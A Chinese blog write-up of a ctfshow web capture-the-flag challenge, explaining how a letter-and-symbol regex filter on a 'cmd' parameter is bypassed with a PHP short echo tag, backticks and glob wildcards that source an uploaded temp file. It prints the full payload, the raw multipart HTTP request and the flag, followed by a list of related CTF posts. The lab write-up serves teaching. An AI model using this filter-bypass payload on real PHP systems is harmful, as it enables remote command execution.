ctfshow_红包题第二弹------glob通配符

最新推荐文章于 2025-08-05 17:34:52 发布
最新推荐文章于 2025-08-05 17:34:52 发布
阅读量806 收藏 18
点赞数 27
CC 4.0 BY-SA版权
分类专栏: web----ctf 文章标签: java 前端 linux ctfshow ctf 文件上传
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hello_mszcc/article/details/149880292

f12有提示

发送get包?cmd=ls,出现代码

这里有两个正则表达式,理解一下

preg_match("/[A-Za-oq-z0-9$]+/",$cmd)   检查$cmd中是否包含至少一个 "大写字母、除 p 外的小写字母、数字或美元符号"。

preg_match("/\~|\!|\@|\#|\%|\^|\&|\*|\(|\)|\(|\)|\-|\_|\{|\}|\[|\]|\'|\"|\:|\,/",$cmd)    使用|分隔多个需要匹配的字符,相当于 "或" 的关系。在正则表达式中,某些字符(如*()[]等)本身具有特殊含义,所以这里使用反斜杠\进行了转义,让它们仅表示字符本身。

我们传什么参呢?

了解一下标签

在php中,<? ?>称为短标签,<?php ?>称为长标签。修改PHP.ini文件配置 short_open_tag = On 才可使用短标签。php5.4.0以后, <?= 总是可代替 <? echo。

+代表空格

URL编码中空格为%20,+表示为%2B。然而url中+也可以表示空格,要表示+号必须得用%2B。

Linux下的glob通配符
  • *可以代替0个及以上任意字符
  • ?可以代表1个任意字符
临时文件

在php中,使用Content-Type: multipart/form-data;上传文件时,会将它保存在临时文件中,在php的配置中upload_tmp_dir参数为保存临时文件的路经,linux下面默认为/tmp。也就是说只要php接收上传请求,就会生成一个临时文件。如果具有上传功能,那么会将这个文件拷走储存。无论如何在执行结束后这个文件会被删除。并且php每次创建的临时文件名都有固定的格式,为phpXXXX.tmp(Windows中)、php**.tmp(Linux中)。

思路就是上传文件生成临时文件,将真正想要执行的函数放到临时文件中,然后利用eval函数进行执行临时文件。

cmd=?><?=`.+/??p/p?p??????`

?>:闭合前面的<?php命令

<?=:相当于<?php echo

反引号:执行命令

.相当于source命令

+:相当于空格

?:文字通配符,负责执行上传的临时文件

构造payload

Content-Type
      Content-Type有两个值:①application/x-www-form-urlencoded(默认值) :上传键值对

                                              ②multipart/form-data:上传文件

boundary
        boundary为边界分隔符

        文件开始标记:-----------------------------10242300956292313528205888

        文件结束标记:-----------------------------10242300956292313528205888--

        其中10242300956292313528205888是浏览器随机生成的,只要足够复杂就可以。

文件内容
        #! /bin/sh 指定命令解释器,#!是一个特殊的表示符,其后,跟着解释此脚本的shell路径。bash只是shell的一种,还有很多其它shell,如:sh,csh,ksh,tcsh。首先用命令ls /  来查看服务器根目录有哪些文件,发现有flag.txt,然后再用cat /flag.txt 即可。

POST /?cmd=?><?=`.+/??p/p?p??????`; HTTP/1.1
Host: 46793251-bac3-4fb9-b4a1-bce2ca80a987.challenge.ctf.show
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,en-GB-oxendict;q=0.5
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------10242300956292313528205888
Content-Length: 246

-----------------------------10242300956292313528205888
Content-Disposition: form-data; name="fileUpload"; filename="1.txt"
Content-Type: text/plain

#! /bin/bash

cat /flag.txt
-----------------------------10242300956292313528205888--

拿到flag

ctfshow{3bde0436-5268-4020-a973-5d261f3fce22}

ctfshow-WEB-未分类-wp
F1rstb100d
09-16 314
ctfshow-WEB-未分类-wp
CTFSHOW WEB
qq_45655564的博客
08-09 3155
web签到 网页原代码中发现这个,base64解码就是flag web2 这道目就是最简单的SQL注入了 发现万能密码可以成功。 于是后台查询语句猜测是select ‘column’ from ‘table’ where username=’$_POST[]’&password=’$_POST[]’ limit 1,1 自己猜的熬,不一定是完全正确的。 这样的话直接闭合前面的单引号就行了。 之后就是 123’ or 1=1 union select 1,2,3# 123’ or 1=1 un
CTFSHOW 红包第二 web
Je3Z的博客
07-14 956
利用临时文件的命令执行 临时文件的命名规则 在上传存储到临时目录后,临时文件命名的规则如下: 默认为 php+4或者6位随机数字和大小写字母 php[0-9A-Za-z]{3,4,5,6} 比如 :phpXXXXXX.tmp 在windows下有tmp后缀,linux没有。 PHP上传机制 php文件上传时会先将上传的文件保存到upload_tmp_dir该配置目录下,这里为/tmp,而上传页面只负责把该文件拷贝到目标目录。也就是说不管该php页面有没有文件上传功能,我们只要上传了文件,该文件就会被上
CTFSHOW-WEB详解
qq_49422880的博客
05-25 5068
CTFSHOW-WEB详解一、WEB13--文件上传二、WEB-红包第二 一、WEB13–文件上传   开始的界面就是文件上传,确定方向为文件上传漏洞分析,尝试上传文件,我上传的第一个文件是一个文本文件很小只有9个字节,就上传成功了直接,还以为会按往常一样出现绝对路径又或者提示只能上传别的格式文件,然后我们通过绕过,接着使用蚁剑连接直接看文件拿到flag。   然而。。。。。。   简单的信息泄露例子,看完绝对不亏.   事情没有我们想的那么简单,我上传一个webshell的时候,发现内容超过了大小,又
ctfshow-web入门56(再次理解无数字字母rce)
qq_44657899的博客
10-18 2033
前言 之前做过一道红包第二,这里也是同样的解法,但是新学到了很多知识点,记录一下。 这个解法,p神的文章讲的很清楚无字母数字webshell之提高篇 文章目录前言glob通配符. 执行文件不需要x权限glob通配符 因为只有PHP生成的临时文件包含大写字母,所以可以用/???/????????[@-[]来匹配我们上传的临时文件。 原理: 翻开ascii码表,可见大写字母位于@与[之间: 那么,我们可以利用[@-[]来表示大写字母: . 执行文件不需要x权限 解 注意传参方式为POST。
ctf-show WEB板块(持续更新)
wobushilijiatu的博客
12-14 365
使用 php://input:可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行,当传入的参数作为文件名打开时,可以将参数设为php://input,同时post写入想要执行的php代码,php执行时会将post内容当作文件内容,从而导致任意代码执行。发现 include 函数 想到 文件包含 GET方式 传入一个url尝试 文件包含 肯定是需要 伪协议了。先试试万能密码 能登录 进去 存在sql注入漏洞。得到了一个文件在 看这个文件 得到flag。发现flag 获取列名。
ctfshow——web(持续更新)
qq_55202378的博客
10-27 824
查看源代码: base64编码特征:大小写+数字,偶尔最后几位是=。登录界面,先测一下是不是存在SQL注入漏洞 SQL注入常见的测试方法就是:再用sqlmap去跑数据库里的内容:(这里直接跑数据包) 看到函数,这一应该是与文件包含有关。是包含GET传参中url参数的值,那么可以考虑php伪协议中的input协议和data协议。 关于php://input和data://text/plain,简单来说:故,poc:
CTFshow记录
bmth666的博客
01-13 3286
文章目录web_月饼杯web1_此夜圆web2_故人心web3_莫负婵娟WEB入门web55红包第二web57 web_月饼杯 最近在ctfshow上看到了不少好,来学一学,做一做 web1_此夜圆 目直接给出了源码: <?php error_reporting(0); class a { public $uname; public $password; public function __construct($uname,$password) { $this->uname
ctf.show web 刷记录
rev1ve的博客
08-21 432
默认为 php+4或者6位随机数字和大小写字母,在windows下有tmp后缀,linux没有。source /home/user/bash 等同于 . /home/user/bash。临时文件夹可通过php.ini的upload_tmp_dir 指定,默认是/tmp目录。我们要利用eval()函数命令执行,但是我们看一下if语句,发现是无字母数字RCE,并且不能用取反,异或,自增去绕过。php上传文件后会将文件存储在临时文件夹,然后用move_uploaded_file()
#_--_coding_UTF-8_--_import_sys,os,dlib,glob,nu_PythonFace.zip
09-30
根据给定的标信息"#_--_coding_UTF-8_--_import_sys,os,dlib,glob,nu_PythonFace.zip",我们可以提取出一些关键知识点。首先,"coding_UTF-8"指明了文件编码格式为UTF-8,这是一种广泛使用的字符编码,能够表示...
fast-glob:这是一个非常快速高效的Node.js Glob
05-12
快球 这是的非常快速高效的库。 该软件包提供了遍历文件系统的方法,并根据Unix Bash shell使用的规则,返回了与指定模式的定义集匹配的路径名,并进行了一些简化,同时以任意顺序返回结果。 快速,简单,有效。...
browser360-cn-stable_10.4.1002.18-1_arm64.deb
04-06
browser360-cn-stable_10.4.1002.18-1_arm64.deb
node-glob-gitignore:扩展“glob”,支持根据 gitignore 规则过滤文件并公开可选的 Promise API
05-29
$ npm i glob-gitignore --save 用法 import { glob , sync , hasMagic } from 'glob-gitignore' // The usage of glob-gitignore is much the same as `node-glob`, // and it supports an array of patterns ...
gulp-sass-glob:在sass中使用glob include
02-03
gulp-sass-glob 插件的来使用水珠进口。 安装 npm install gulp-sass-glob --save-dev 基本用法 main.scss @import " vars/**/*.scss " ; @import " mixins/**/*.scss " ; @import " generic/**/*.scss " ; @...
JVM 01 运行区域
2301_79308687的博客
08-02 999
虚拟机隐藏平台差异,解决不同平台代码运行结果不一致问,实现,实现用户代码跨平台。它本身是一个操作系统上的应用程序,将字节码文件翻译成特定机器的机器码。
Flash循环存储的地址回绕处理:跨边界写入的三种实现方案
最新发布
u010360138的博客
08-05 514
本文介绍了三种实现Flash循环存储地址计算的方法:1)条件判断法通过显式判断是否溢出实现地址回绕,逻辑清晰通用性强;2)模运算法利用取模运算自动处理地址回绕,代码简洁;3)位掩码法在存储区大小为2的幂时使用位与运算替代模运算,性能最优。三种方法功能等效但各有特点,选择时应考虑存储区特性、性能需求和代码可读性。关键注意事项包括写入延迟、地址有效性检查和边界条件处理。
基于Java的AI/机器学习库(Smile、Weka、DeepLearning4J)的实用
keny-大成的博客
08-04 594
Java中定义AI动作,通常涉及枚举或常量类来列举可识别的合理动作。挥手(WAVE)点头(NOD)摇头(SHAKE_HEAD)鼓掌(CLAP)举手(RAISE_HAND)叉腰(HANDS_ON_HIPS)抱臂(CROSS_ARMS)指向前方(POINT_FORWARD)竖起大拇指(THUMBS_UP)竖起小拇指(THUMBS_DOWN)比心(HAND_HEART)敬礼(SALUTE)握拳(FIST)张开双手(OPEN_HANDS)双手合十(PRAY)
mybatis-plus动态数据源
qq_62408075的博客
08-01 213
不同于mybatis动态数据,mybatisplus自带很多查询方法。
YAML文件
2301_80251684的博客
08-04 136
YAML是一种数据序列化格式,常用于配置文件、数据交换和存储。其设计目标是简洁易读,同时支持复杂数据结构。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值